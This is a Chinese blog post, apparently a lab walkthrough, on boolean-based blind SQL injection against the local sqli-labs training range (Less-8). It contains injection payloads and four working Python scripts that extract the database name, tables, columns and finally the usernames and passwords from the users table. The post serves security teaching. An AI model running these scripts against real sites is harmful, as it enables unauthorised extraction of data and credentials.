Sqli-labs-master靶场--布尔盲注

于 2024-08-05 22:48:23 发布
阅读量776 收藏 19
点赞数 9
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ningwangh/article/details/140936321
版权

目录

1、布尔盲注

2、布尔盲注的流程(以靶场less-8为例)

2.1输入id尝试是否存在注入点

2.1.1通过以上尝试,联想到可能是布尔盲注

2.2猜测数据库长度

2.3获取数据库名

2.3.1python脚本获取

代码:

获取结果为:

2.4获取表名

2.4.1count() 函数获取表名长度

2.4.2获取表名

代码:

结果:

2.5获取字段名

代码:

结果:

获取数据:

1、布尔盲注

        布尔盲注就是在SQL注入过程中,SQL语句执行后,查询到的数据不能回显到前端页面,布尔盲注通常是由于开发者将报错信息屏蔽而导致的,但是网页中真和假有着不同的回显,比如为真时返回access,为假时返回false;或者为真时返回正常页面,为假时跳转到错误页面等。不需要返回结果,仅判断语句是否正常执行。

2、布尔盲注的流程(以靶场less-8为例)

2.1输入id尝试是否存在注入点

        输入?id=1后,显示为下图

        输入?id=1' 后,显示与上方不同,存在注入点

        判断一下字段数:?id=1’ order by 3 --+,显示You are in…

        尝试显示报错位:?id=1' union select 1,2,3 --+,仍然为You are in…

2.1.1通过以上尝试,联想到可能是布尔盲注

2.2猜测数据库长度

确定数据库长度为8。

2.3获取数据库名

        通过截取字符串的方式。函数substr(string, start, length) 截取字符串,这个函数用来截取一个字符串从'start'位,可以是第1位、第2位、第3位,以此类推。每次截取'length'个字符。然后使用ascii()函数。其作用是将字符转换成对应的ascii值。

?id=1' and ascii(substr(database(),1,1))=97--+

        如上图所示,如果数据库名的第一个字符的ascii码值等于97,则页面显示正确的页面,如果数据库名的第一个字符的ascii码值不等于97,则页面显示错误的页面,可以通过这种方式获取到数据库名,但效率过于低下,所以我们使用脚本来获取数据库名。

2.3.1python脚本获取

        使用下列代码就可以获取到数据库名

代码:
import time
 
import requests
 
url = 'http://127.0.0.1/sqli-labs-master/less-8/index.php'
 
def inject_database(url):
    name = ''
    for i in range(1, 20):
        for j in range(32, 129):
            payload = "1' and ascii(substr(database(), %d, 1)) = %d-- " % (i, j)
            res = {"id": payload}
            r = requests.get(url, params=res)
            if "You are in..........." in r.text:
                name = name + chr(j)
                print(name)
                break
            else:
                continue
 
inject_database(url)
获取结果为:

2.4获取表名

2.4.1count() 函数获取表名长度

?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database()limit 0,1),1,1)))=101 --+

由上图可见,看出security下有四张表

2.4.2获取表名

利用下面的python脚本就可以获取到所有的表名

代码:
import requests
 
url = 'http://127.0.0.1/sqli-labs-master/less-8/index.php'
 
 
def boolean_blind_inject(url):
    name = ''
    for i in range(1, 50):
        low = 32
        high = 128
        while low < high:
            mid = (low + high) // 2
            # 构造布尔盲注的payload
            payload ="1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),%d,1))> %d-- " %(i, mid)
            params = {'id': payload} 
 
            # 发送 GET 请求
            r = requests.get(url, params=params)
 
         
            if 'You are in...........' in r.text:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
 
        if mid == 32:  
            break
        name += chr(mid)
        print(name)

boolean_blind_inject(url)
结果:

2.5获取字段名

        利用表名可以获取到用户的账户和密码在users表中,使用上面python脚本来获取字段名,需要将刚才的python脚本中payload的内容换一下。

代码:
import requests
 
url = 'http://127.0.0.1/sqli-labs-master/less-8/index.php'
 
 
def boolean_blind_inject(url):
    name = ''
    for i in range(1, 50):
        low = 32
        high = 128
        while low < high:
            mid = (low + high) // 2
            # 构造布尔盲注的payload
            payload ="1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),%d,1))> %d-- " %(i, mid)
            params = {'id': payload}  # 使用 params 而不是 data
 
            # 发送 GET 请求
            r = requests.get(url, params=params)
 
            # 根据页面内容或状态码判断是否注入成功
            if 'You are in...........' in r.text:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
 
        if mid == 32:  # 如果 mid 为 32,则表示已经到达字符串的末尾
            break
        name += chr(mid)
        print(name)
 
# 调用函数
boolean_blind_inject(url)
结果:

获取数据:

import requests
 
url = 'http://127.0.0.1/sqli-labs-master/less-8/index.php'
 
 
def boolean_blind_inject(url):
    name = ''
    for i in range(1, 200):
        low = 32
        high = 128
        while low < high:
            mid = (low + high) // 2
            # 构造布尔盲注的payload
            payload ="1' and ascii(substr((select group_concat(username,id,password) from users),%d,1))> %d-- " %(i, mid)
            params = {'id': payload}  # 使用 params 而不是 data
 
            # 发送 GET 请求
            r = requests.get(url, params=params)
 
            # 根据页面内容或状态码判断是否注入成功
            if 'You are in...........' in r.text:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
 
        if mid == 32:  # 如果 mid 为 32,则表示已经到达字符串的末尾
            break
        name += chr(mid)
        print(name)
 
# 调用函数
boolean_blind_inject(url)

ok,完成。

ningwangh
关注
  • 9
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqli-labs Less-8(布尔盲注
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
02-11 573
布尔盲注其实就是构造一个SQL语句,当语句成立时,页面会返回特点的标识,语句不成立是返回其他,或无数据。因此我们可以构造一个判断语句,利用页面的返回结果来得知判断语句是否正确。 再学习布尔盲注之前,一些常用函数如下: length(): 返回字符串长度。 substr(str, start, len): 截取str,从start开始,截取长度为len。 ascii(): 返回字符串的ascii码。 1、判断共有几个数据库 payload ?id=1' and (select count(schema_na
sqli-labs第十五和十六关(post请求-布尔盲注
qq_42266432的博客
08-26 910
开启第十五关,先尝试注入,注入多次后发现页面无报错也无回显,于是尝试盲注 使用万能密码’ or 1=1登陆成功,’ or 1=2登录失败,这里可以使用布尔盲注, 研究响应页面发现登录成功和登录失败时底下的提示是一个图片,而图片的命名不同,可以此区分成功和失败,开始写脚本,脚本的思路和之前使用布尔盲注的关卡类似,只需修改请求类型、数据和if条件即可,代码如下: import requests # 获取数据库名长度 def database_len(): for i in range(1,10):
sqli-labs-基于布尔盲注
zlloveyouforever的博客
04-29 1104
sqli-labs第五关--基于布尔盲注
sqli-labs-Less-16 布尔盲注
yzcn
11-13 173
Less-16 布尔盲注 利用burp suite进行抓包 利用hackba插件中的post data进行注入 方法一:布尔盲注 判断注入点: uname=") or 1=1 # &passwd=&submit=Submit 显示登录成功,说明闭合方式为(“”),存在注入漏洞 猜解当前数据库名: 猜解数据库名长度: uname=") or length(database())>5# &passwd=&submit=Submit 第一个字母:uname=") or
Sqli-labs 复习 Less08 布尔sql盲注 - GET
kevinhanser
08-11 420
之前学习了一遍 sqli-labs,这是巩固复习一遍,代码全部手敲,加深印象 Sqli-labs 博客目录 布尔sql 盲注 Less-8 布尔sql盲注-单引号 测试 payload ?id=1'or 1=1--+ 四种方法讲解: left() ascii()、substr() regexp ord()、mid() 其中: left(strin...
Sqli-labs Less08 布尔sql盲注 - GET
kevinhanser
08-09 531
本文记录 SQL 注入的学习过程,资料为 SQLi SQLi 博客目录 Less - 08: GET - Blind - Boolian Based - Single Quotas 测试漏洞 在 URL 后面添加 ‘or 1=1–+ http://10.10.10.137/sqli-labs/Less-8/?id=1'and If(ascii(substr(database...
sqli-labs靶场练习笔记
11-09
### SQLi-Labs靶场练习笔记知识点概览 #### 一、SQL注入基本概念与原理 - **定义**:SQL注入是一种常见的应用层攻击方式,它利用编程中的漏洞,通过在应用程序的输入框中插入恶意SQL语句来控制后端数据库服务器。 -...
sqli-labs-master靶场
07-14
sqli-labs-master靶场提供了实战环境,让学习者能够实践各种SQL注入技巧,如盲注、时间基注入、union注入等,并了解如何修复这些漏洞。 靶场的结构通常包含以下部分: 1. **登录与注册模块**:这是最常见的SQL注入...
sqli-labs第八关(布尔盲注
qq_42266432的博客
08-19 1445
第八关看标题可知此关可以使用布尔盲注布尔盲注我的理解是页面不会回显错误,但是注入等式或不等式时通过页面的反应能判断出注入中算式的true或false 布尔盲注的步骤如下: 获取数据库长度 获取数据库名 获取数据库表 获取表中字段 获取表中数据 先拿获取数据库长度举例 可以看到在length(database())>7时页面正常,length(database())>8时页面异常,即8>7=true,8>8=false,所以数据库名长度为8 再比如获取表名: 同理,sub
sqli-labs-master
08-23
SQL注入靶场sqli-labs-master”是一个专门为学习和测试SQL注入漏洞而设计的实践环境。这个靶场包含了多个级别的练习,旨在帮助用户逐步掌握SQL注入的基本概念、技术以及防御策略。通过这个靶场,你可以深入了解SQL...
sqli labs lesson 8,布尔盲注
dhdichch的博客
04-16 3062
1.什么是布尔盲注 布尔盲注是指,利用页面返回的对错信息来间接推测数据库中的信息。 2.获取数据库名 注入点很容易判断,是一个单引号的注入。 接着开始布尔盲注,我们首先当前获取数据库的名称: id=1'and length(database())=20--+ 手工注入的话先用>或者<来判断表长度的大致范围,我这里用Burpsuite,直接写了等于号 可以看到当值为8时,页面返回的是You are in,说明数据库名的长度为8 那接下来就可以挨个判断每个位置的字符了 an
sqli-labs布尔盲注脚本的编写
0xdawn的博客
03-12 1396
0x00 前言 此脚本基于sqli-labs/Less-5编写,采用ASCII码判断布尔类型,注入标志为"You are in…"。 第一次独立编写完整脚本,感觉很多地方写的不好。条件分支,字典、列表的遍历都花了很长时间去弄 无论是时间复杂度还是代码可读性,感觉都很拉跨。师傅们轻喷。。。 以下是模块解析 0x01 模块 1.判断数据库库名长度 def db_length(): db_l...
SQL盲注-实战布尔盲注
dkxkl1314的博客
03-09 2771
环境:win10靶场sqli-labs-master盲注就是在SQL注入过程中,SQL语句执行后,查询到的数据不能 回显到前端页面。此时,我们需要利用一些方法进行判断或者尝 试,这个过程称之为盲注。而布尔盲注就是SQL语句执行后,页面 不返回具体数据,数据库只返回0或者1(真or假)。类似于无法开口说话的人,只能通过点头和摇头来告诉你答案的正 确与否。在页面中,如果正确执行了用户构造的SQL语句,则返回一种页 面,如果 SQL语句执行错误,则执行另一种页面。
sqli-labs笔记(4)盲注布尔,时间)
weixin_43798683的博客
04-23 496
盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入。盲注一般分为布尔盲注和基于时间的盲注和报错的盲注。 Length():函数 返回字符串的长度 Substr():截取字符串 Ascii():返回字符的ascii码 sleep(n):将程序挂起一段时间 n为n秒 if(expr1,expr2,expr3): 判断语句 如果第一个语句正确就执行第二个语句如果...
sqlilabs第五关布尔盲注(burpsuite版)
最新发布
xnxqwzy的博客
04-20 907
一.判断有无注入点及注入类型:id=1​编辑id=1’(这里可以看到页面显示sql语句报错信息,基本可以判定为’闭合)​编辑补全后查看页面效果(1=1时有返回页面,1=2时无返回页面,无报错信息,符合页面布尔类型状态,尝试使用布尔型注入)1.页面没有回显不能用联合查询(order by、union select ),页面没有报错信息不能用报错注入。2.页面布尔类型状态:页面无回显且无报错信息。id=1’ – +​编辑​编辑​编辑猜测数据库长度:(若是猜错,没有返回页面)​编辑。
SQL注入学习——Bool盲注详解 sqli-labs(Less 8)
未完成的歌~的博客
07-29 6511
Less-7导出文件GET字符型注 打开页面输入?id=1 试了很多发现报错信息都一样,查看下源代码: if($row) { echo '<font color= "#FFFF00">'; echo 'You are in.... Use outfile......'; echo "<br>"; echo "</font>"; ......
盲注学习(sqli-labs 8(布尔盲注) 9(时间盲注))
欢迎光临
06-06 1560
所以称为盲注是因为他不会根据你sql注入的攻击语句返回你想要知道的错误信息。盲注分为两类:    1.布尔盲注 布尔很明显Ture跟Fales,也就是说它只会根据    你的注入信息返回Ture跟Fales,也就没有了之前的报错信息。    2.时间盲注 界面返回值只有一种,true 无论输入任何值 返回情况都会按正常的来处理。加入特定的时间函数,通过查看web页面返回的时间差来判断注入的语句是否...
sqli-labs攻关2(布尔盲注、时间盲注)
qwzf
07-22 942
前言 之前已经通过sqli-libs攻关的方式,总结过SQL注入的简单注入和双注入。所以这次继续通过sqli-libs攻关的方式总结SQL注入的布尔盲注和时间盲注。 正文 ...
SQLi-Labs靶场安装教程:PHPStudy与MySQL配置
"sqli-labs-master靶场安装下载" 本文将详细介绍如何在本地环境中安装和配置sqli-labs靶场,该靶场用于学习和实践SQL注入攻击的防御技巧。sqli-labs是一个非常实用的在线安全训练平台,适合初学者熟悉SQL注入漏洞的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值